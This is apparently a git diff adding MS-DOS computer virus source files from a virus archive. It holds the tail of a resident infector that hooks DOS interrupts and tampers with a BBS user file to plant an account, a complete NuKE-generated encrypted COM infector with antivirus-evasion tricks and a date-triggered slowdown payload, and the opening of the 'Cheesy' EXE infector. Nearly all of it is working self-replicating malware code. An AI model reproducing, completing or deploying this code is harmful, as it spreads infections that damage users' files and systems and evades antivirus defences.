+ jnz Get_0
+ mov cx,0Ah
+ xor bx,bx
+ xor ax,ax
+ cwd ; Dx = 0
+Get_CSum: dec si
+ rol bx,1
+ mov al,[si]
+ or al,20h
+ xor bl,al
+ add dx,ax
+ loop Get_CSum
+ cmp bx,1AE7h
+ jne Go_Dos
+ cmp dx,3B7h
+ jne Go_Dos
+
+Is_Users: mov word ptr cs:[Save_A_Reg],si
+ mov di,offset Coded
+Del_Si: mov si,word ptr cs:[Save_A_Reg]
+Lp_Unc: lodsb
+ or al,al
+ jz Del_Si
+ or al,20h
+ sub byte ptr cs:[di],al
+ inc di
+ cmp di,offset No_Read
+ jb Lp_Unc
+
+Coded: call Retr_Regs
+ and al,0FEh
+ or al,2
+ call Call_Dos
+ jnc Has_Read
+ jmp No_Read
+Has_Read: pushf
+ call Save_Regs
+ xchg bx,ax
+ mov ah,3Fh
+ mov cx,9Eh
+ mov dx,offset End_Virus
+ call Call_Dos
+ mov dx,[End_Virus+20h]
+ mov cx,[End_Virus+22h]
+ or cx,cx
+ jnz Test_Ok
+ or dx,dx
+ jz No_XS_YET
+
+Test_Ok: mov ax,4200h
+ call Call_Dos
+ mov ah,3Fh
+ mov dx,offset End_Virus+9Eh
+ mov cx,9Eh
+ call Call_Dos
+ cmp ax,cx
+ jnz 
No_XS_YET + cmp byte ptr [End_Virus+9Eh],3 + jne No_XS_YET + test byte ptr [End_Virus+9Eh+77h],1 + jnz No_XS_YET + mov ax,[End_Virus+84h] + cmp ax,[End_Virus+9Eh+84h] + jne No_XS_YET +J_Less: jmp Less_Users + +No_XS_Yet: mov ax,4202h + xor cx,cx + cwd ; Dx = 0 + call Call_Dos + or dx,dx + jnz More_Users + cmp ax,9Eh*50 ; 50 users of meer + jb J_Less + +More_Users: mov cx,9Eh + div cx + or dx,dx + jnz J_Less + shr ax,1 + mul cx + xchg cx,dx + xchg dx,ax + mov ax,4200h + call Call_Dos +Read_Lp: mov ah,3Fh + mov dx,offset End_Virus+9Eh + mov cx,9Eh + call Call_Dos + cmp ax,cx + jne Less_Users + test byte ptr [offset End_Virus+9Eh+77h],1 ; Search deleted + je Read_Lp + mov ax,4201h + mov cx,-1 + mov dx,-9Eh + call Call_Dos + push dx + push ax + mov [End_Virus+20h],ax + mov [End_Virus+22h],dx + mov ax,4200h + xor cx,cx + cwd ; dx = 0 + call Call_Dos + mov ah,40h + mov cx,9Eh + mov dx,offset End_Virus + call Call_Dos + mov ax,4200h + pop dx + pop cx + call Call_Dos + push ds + pop es + mov al,0 + mov di,offset End_Virus + mov cx,106h-9Eh + repz stosb + mov ax,2020h + mov cx,5 +Wrt_20s: inc di + stosw + loop Wrt_20s + +;HIER STAAN NAAM EN PASSWORD. +; Naam en password zijn 3 chars, Name = , Password = +; Zijn dus Name = 1F 20 7E, Password = 4D 5A B8 +; Staan zoals hier: +; +; mov ..., 0 +; ..... 0 +; Password: +; ..... ,0 +; ..... 
,0 +; + mov word ptr [End_Virus],01F03h + mov word ptr [End_Virus+2],07E20h + mov word ptr [End_Virus+3Eh],04D03h + mov word ptr [End_Virus+40h],0B85Ah + + + mov ah,40h + mov cx,9Eh + mov dx,offset End_Virus + call Call_Dos + +Less_Users: call Go_Beg_File + popf + call Retr_Regs +No_Read: pushf + push ax + push si + push di + push ds + mov di,offset Coded +Del_Si_2: mov si,word ptr cs:[Save_A_Reg] +Lp_Unc_2: lodsb + or al,al + jz Del_Si_2 + or al,20h + add byte ptr cs:[di],al + inc di + cmp di,offset No_Read + jb Lp_Unc_2 + + pop ds + pop di + pop si + pop ax + popf + + call Rest_21_Jmp + retf 2 + +;*** I 21 FCT 3C - Rewrite file *** + +Open_Wrt: cld + test byte ptr cs:[Flags],1 ; Already sure-exec opened? + jnz J_JD_2 + + push ds + pop es + xchg di,dx + mov al,0 + mov cx,-1 + repnz scasb + mov ax,[di-5] + or ax,2020h + cmp ax,'c.' + jne No_Com + mov ax,[di-3] + or ax,2020h + cmp ax,'mo' + jne Open_It +Sure_Exec: or byte ptr cs:[Flags],1 +Open_It: call Retr_Regs + call Call_Dos + jc Not_Opened + mov word ptr cs:[Exec_Handle],ax +Not_Opened: call Rest_21_Jmp + retf 2 + +No_Com: cmp ax,'e.' ; '.E'? + jne Open_It + + mov ax,[di-3] + or ax,2020h + cmp ax,'ex' ; .. 'XE'? + je Sure_Exec +OJ_2: jmp short Open_It + +;*** I21 FCT 3E - Infect on close if orig. prog has written too *** + +Check_Close: push cs + pop ds + cmp bx,[Exec_Handle] ; Same file? +J_JD_2: jne JD_2 + mov word ptr [Exec_Handle],0FFFFh ; Don't follow anymore + call Go_Beg_File ; Go to beg. of file + mov ah,3Fh ; Read first bytes + mov cx,18h + mov dx,offset Read_Buf + call Call_Dos + and byte ptr [Flags],0FBh ; Flag for COM + cmp word ptr [Read_Buf],'ZM' ; MZ - Exe? + je Infect_Exe + test byte ptr [Flags],1 ; Sure exec? 
+ jnz Infect_Com + and byte ptr cs:[Flags],0FEh +JD_2: jmp Go_Dos + +Infect_Exe: or byte ptr [Flags],4 ; Flag for EXE + mov ax,[Read_Buf+16h] + mov [Exe_CS+1],ax + mov ax,[Read_Buf+14h] + mov [Exe_IP+1],ax + cmp ax,offset Init + je OJ_2 + mov ax,[Read_Buf+0Eh] + mov [Exe_SS+1],ax + mov ax,[Read_Buf+10h] + mov [Exe_SP+1],ax +Infect_Com: and byte ptr [Flags],0FEh + cmp word ptr [Read_Buf],0B80Eh + je JD_2 + cmp word ptr [Read_Buf],0BFh + je JD_2 + +Not_Inf: mov ax,4202h ; Go to end of file + xor cx,cx + cwd ; Dx = 0 + call Call_Dos + + test byte ptr [Flags],4 + jz No_Ovl_Test + + push ax ; .EXE: Test for internal overlays + push dx + mov cx,200h + div cx + cmp dx,[Read_Buf+2] + jne Is_Ovl + or dx,dx + jz No_Corr_Chk + inc ax +No_Corr_Chk: cmp ax,[Read_Buf+4] +Is_Ovl: pop dx + pop ax + je No_Ovl_Test + +JD_3: jmp short JD_2 + +No_Ovl_Test: add ax,0Fh ; End in paragraphs + adc dx,0 + and ax,0FFF0h + + mov Org_Fl_Len_Lo,ax + mov Org_Fl_Len_Hi,dx + + push ax + mov cl,4 + shr ax,cl + mov [CodePars+1],ax + or al,al + jnz No_Al_0 + dec al +No_Al_0: mov byte ptr [offset S_5-1],al + pop ax + + push ax + push dx + + mov cx,dx ; Go to end-in-paragraphs + mov dx,ax + mov ax,4200h + call Call_Dos + + push cs + pop es + mov si,100h + mov di,offset End_Virus + mov cx,offset End_Virus-100h + mov dl,byte ptr cs:[offset S_5-1] +Code_Lp: lodsb + cmp si,offset Init + ja No_Code + xor al,dl +No_Code: stosb + loop Code_Lp + + mov ax,5700h + call Call_Dos + mov Org_Fl_Time,cx + mov Org_Fl_Date,dx + + mov ah,40h ; Write virus behind program + mov cx,offset End_Virus-100h + mov dx,offset End_Virus + call Call_Dos + + call Go_Beg_File + + mov dx,offset Com_First + mov cx,10h + + pop si + pop ax + + test byte ptr [Flags],4 + jz Init_Com + + mov dx,si + mov cx,4 +Get_CS: shr dx,1 + rcr ax,1 + loop Get_CS + + sub ax,[Read_Buf+8] ; - header size + sub ax,10h + mov [Read_Buf+16h],ax + mov [Read_Buf+0Eh],ax + mov word ptr [Read_Buf+14h],offset Init + mov word ptr [Read_Buf+10h],offset 
End_Virus+100h + + mov ax,Org_Fl_Len_Lo + mov dx,Org_Fl_Len_Hi + + add ax,offset End_Virus-100h + adc dx,0 + mov cx,200h + div cx + or dx,dx + jz No_Corr + inc ax +No_Corr: mov [Read_Buf+2],dx + mov [Read_Buf+4],ax + mov dx,offset Read_Buf + mov cx,18h + +Init_Com: mov ah,40h + call Call_Dos + + mov ax,5701h + mov cx,Org_Fl_Time + mov dx,Org_Fl_Date + call Call_Dos + +JD_4: jmp short JD_3 + + +;*** 00 / 31 / 4C: End program *** + +Stop_Prg: push ds + push bx + lds bx,cs:[Jmp_22+1] + cli + mov byte ptr [bx],0EAh + mov word ptr [bx+1],offset Int_22 + mov word ptr [bx+3],cs + sti + pop bx + pop ds + jmp short JD_4 + +Int_22: call Rest_21_Jmp + push cs + pop ds + les di,dword ptr [Jmp_22+1] + mov si,offset Org_22 + call Move_Bytes + call Retr_Regs +Jmp_22: jmp 0:0 + +Org_22 db 5 dup (?) + +;*** Start prog *** + +Start_Prg: lds bx,cs:[Jmp_13+1] + cli + mov byte ptr [bx],0EAh + mov word ptr [bx+1],offset Int_13 + mov word ptr [bx+3],cs + sti + call Retr_Regs +JD_5: jmp short JD_4 + +Int_13: call Rest_21_Jmp + push si + push di + push ds + push es + push cs + pop ds + les di,dword ptr [Jmp_13+1] + mov si,offset Org_13 + call Move_Bytes + pop es + pop ds + pop di + pop si +Jmp_13: jmp 0:0 + +Org_13 db 5 dup (?) 
+ +;*** Check for string 'iru' (vIRUs) *** + +Check_Vir: cmp bx,cs:[Exec_Handle] + jne No_Vir + sub cx,2 + jc No_Vir + push ds + pop es + mov di,dx + mov al,'i' +Iru_Lp: repnz scasb + jnz No_Vir + cmp word ptr [di],'ur' + jne Iru_Lp + mov word ptr cs:[Exec_Handle],0FFFFh + and byte ptr cs:[Flags],0FEh +No_Vir: jmp short JD_5 + + +Move_Bytes: cli + cld + movsw + movsw + movsb + sti + ret + +Rest_Orig_21: push si + push di + push ds + push es + push cs + pop ds + mov si,offset Org_21_Code + les di,dword ptr [Org_21_Addr] + call Move_Bytes + pop es + pop ds + pop di + pop si + ret + +Rest_21_Jmp: push ds + push bx + lds bx,dword ptr cs:[Org_21_Addr] + cli + mov byte ptr [bx],0EAh + mov word ptr [bx+1],offset New_21 + mov word ptr [bx+3],cs + sti + pop bx + pop ds + ret + +;*** Proc: Save regs *** + +Save_Regs: mov word ptr cs:[Save_Ds],ds + push cs + pop ds + mov word ptr [Save_Ax],ax + mov word ptr [Save_Bx],bx + mov word ptr [Save_Cx],cx + mov word ptr [Save_Dx],dx + mov word ptr [Save_Si],si + mov word ptr [Save_Di],di + mov word ptr [Save_Es],es + ret + +Retr_Regs: push cs + pop ds + mov ax,word ptr [Save_Ax] + mov bx,word ptr [Save_Bx] + mov cx,word ptr [Save_Cx] + mov dx,word ptr [Save_Dx] + mov si,word ptr [Save_Si] + mov di,word ptr [Save_Di] + mov es,word ptr [Save_Es] + mov ds,word ptr [Save_Ds] + ret + +Go_Beg_File: mov ax,4200h + xor cx,cx + cwd ; dx = 0 + call Call_Dos + ret + +Exec_Handle dw 0FFFFh ; Handle of opened-with-write- exec. file + +Flags db (?) ; Flags: 1 = Sure exec (- Maybe data) + ; 4 = EXE-file (- COM) + +Org_Fl_Len_Lo dw (?) +Org_Fl_Len_Hi dw (?) + +Org_Fl_Time dw (?) +Org_Fl_Date dw (?) + +Save_Ax dw (?) +Save_Bx dw (?) +Save_Cx dw (?) +Save_Dx dw (?) +Save_Si dw (?) +Save_Di dw (?) +Save_Ds dw (?) +Save_Es dw (?) + +Save_A_Reg dw (?) 
+ +Decoded: mov word ptr cs:[Save_A_Reg],ds + push ax + push bx + push cx + push dx + push ds + push es + + mov ah,45h + mov bx,0D15h + int 21h + cmp bx,0F0Ch + jne N_Y_Inst + jmp Jmp_No_Init +N_Y_Inst: cld + + xor ax,ax + mov ds,ax + + mov ax,[88h] ; Save I22 addr + mov cs:[Jmp_22+1],ax + mov ax,[8Ah] + mov cs:[Jmp_22+3],ax + + mov ax,[04Ch] ; Save I13 addr + mov cs:[Jmp_13+1],ax + mov dx,[04Eh] + mov cs:[Jmp_13+3],dx + + mov ah,52h + int 21h + cmp dx,es:[bx-2] + jnb Jmp_No_Init + + push [84h] + push [86h] + + push cs + pop ds + + push cs + pop es + + mov si,offset Com_First + mov di,offset Com_Start_2 + +MoveStrt: lodsw ; Other .COM start-up + cmp si,offset CodePars+3 + je No_MS_Lp + xchg ax,[di] + mov [si-2],ax + inc di + inc di +No_MS_Lp: cmp si,offset VirTitle + jb MoveStrt + + xor byte ptr [Init],1 + xor byte ptr [S_9],6Ch + xor byte ptr [Decode_Lp+2],1 + xor byte ptr [S_5],1 + xor byte ptr [S_6+1],1 + xor byte ptr [S_7],7 + xor byte ptr [S_8],6Ch ; Nop <> CLD + + mov ax,word ptr cs:[Save_A_Reg] + dec ax +MCB_Loop: mov ds,ax + cmp byte ptr [0],'Z' + je Found_End_MCB + add ax,[3] + inc ax + cmp ah,0A0h + jb MCB_Loop + add sp,4 +Jmp_No_Init: jmp short No_Init + +Found_End_MCB: mov bx,[3] +Here_Pars: sub bx,100h ; Filled in init-proc. 
+ jc No_Init + mov [3],bx + add ax,bx + inc ax + mov ds,cs:[Save_A_Reg] + mov word ptr [2],ax + sub ax,10h + mov cx,offset End_Virus-100h + push cs + pop ds + mov es,ax + mov si,100h + mov di,si + repz movsb + + pop ds + pop si + + mov es:[Org_21_Addr],si + mov es:[Org_21_Addr+2],ds + + mov di,offset Org_21_Code + + call Move_Bytes + + cli + mov byte ptr [si-5],0EAh + mov word ptr [si-4],offset New_21 + mov word ptr [si-2],es + sti + + lds si,cs:[Jmp_22+1] + mov di,offset Org_22 + + call Move_Bytes + + lds si,cs:[Jmp_13+1] + mov di,offset Org_13 + + call Move_Bytes + +No_Init: pop es + pop ds + pop dx + pop cx + pop bx + pop ax + + test cs:Flags,4 + jnz Rest_Stack + + push ds + push cs + pop ds + mov cx,10h + mov si,offset Read_Buf + mov di,100h + repz movsb + pop ds + retf + +Rest_Stack: mov ax,ds ; Stack restore for .EXE files +Exe_SS: add ax,0 + add ax,10h + cli + mov ss,ax +Exe_SP: mov sp,0 + sti + mov ax,ds +Exe_Cs: add ax,0 + add ax,10h + push ax +Exe_Ip: mov ax,0 + push ax + retf + +Com_Start_2: mov di,100h + push cs + mov ax,cs + push di + db 05h ; Add Ax,xxxx + mov di,offset Init + push ax + push di + retf + +;*** INIT - ONLY DECODE - PART *** + +Init: mov si,offset Com_First +S_9: cld +Decode_Lp: xor byte ptr cs:[si],0 +S_5: inc si +S_6: cmp si,offset Init +S_7: jne Decode_Lp +S_8: nop + jmp Decoded + +Read_Buf db 0CDh,20h + db 16h dup (?) 
+
+End_Virus: cld
+ mov word ptr [S_3+1],offset Init
+ mov word ptr [Here_Pars+2],(((offset End_Virus-101h) shr 4) +1) shl 1
+ mov di,offset Coded
+New_Us: mov si,offset User_St
+B_V_CLp: lodsb
+ or al,al
+ jz New_Us
+ add [di],al
+ inc di
+ cmp di,offset No_Read
+ jb B_V_CLp
+ jmp Init
+
+User_St db 'users.bbs',0
+
+;****************************************************************************;
+; ;
+; -=][][][][][][][][][][][][][][][=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] [=- ;
+; -=] For All Your H/P/A/V Files [=- ;
+; -=] SysOp: Peter Venkman [=- ;
+; -=] [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=][][][][][][][][][][][][][][][=- ;
+; ;
+; *** NOT FOR GENERAL DISTRIBUTION *** ;
+; ;
+; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
+; Around Among the General Public. It Will be Very Useful for Learning how ;
+; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
+; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
+; Experience can Turn it Into a far More Malevolent Program Than it Already ;
+; Is. Keep This Code in Responsible Hands! ;
+; ;
+;****************************************************************************;
+
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪;
+;哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪哪;
+;哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪;
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪;
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.cheeser.asm b/MSDOS/Virus.MSDOS.Unknown.cheeser.asm
new file mode 100644
index 00000000..9cf4b372
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cheeser.asm
@@ -0,0 +1,416 @@ +;谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +;滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! 
+ ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! 
+;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. 
AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! 
+jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset 
fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. 
INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; + +mov ax,351ch ; +int 21h ;store the int 1ch vectors +mov word ptr [trampaint+bp],bx ;in cs:trampaint +mov word ptr [trampaint+2+bp],es ; +mov ax,251ch ;put the int 1ch (clock) vector +push cs ; +pop ds ; +mov dx,offset tardar ;in offset tardar +int 21h ; +mov dx,offset fin ; +int 27h ;main resident the code +NO_DAY: ; +ret ;ret for program +tardar: ;int 1c handler +pushf ; +pusha ; +mov cx,0ffffh ;fuck loop for slow speed +trampa: ; +mov ax,ax ; +loop trampa ; +popa ; +popf ; +JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch +ret ; +trampaint dd ? ; +;--------------------------------; + +;-------------; +Dir_S: ; +jmp dirsal ; +no_Good:iret ; +;-------------; + +action_dia Db 01H ;day for the action +action_mes Db 01H ;month for the action +FECHA DW 018H ;Secon for mark +FECHAd Db 018H ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cheesy.asm b/MSDOS/Virus.MSDOS.Unknown.cheesy.asm new file mode 100644 index 00000000..013156a6 --- /dev/null 
+++ b/MSDOS/Virus.MSDOS.Unknown.cheesy.asm 
@@ -0,0 +1,186 @@ + .model tiny ; Handy TASM directive + .code ; Virus code segment + org 100h ; COM file starting IP + ; Cheesy EXE infector + ; Written by Dark Angel of PHALCON/SKISM + ; For 40Hex Number 8 Volume 2 Issue 4 + id = 'DA' ; ID word for EXE infections + + startvirus: ; virus code starts here + call next ; calculate delta offset + next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw + movsw + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + lea dx,[bp+exe_mask] + mov ah,4eh ; find first file + mov cx,7 ; any attribute + findfirstnext: + int 21h ; DS:DX points to mask + jc done_infections ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe + find_next: + mov ah,4fh ; find next file + jmp short findfirstnext + done_infections: + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + pop es + pop ds ; DS->PSP + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[si+jmpsave+2],ax + add ax,word ptr cs:[si+stacksave+2] + cli ; Clear intrpts for stack manip. + mov sp,word ptr cs:[si+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo + jmpsave dd ? ; Original CS:IP + stacksave dd ? ; Original SS:SP + jmpsave2 dd 0fff00000h ; Needed for carrier file + stacksave2 dd ? 
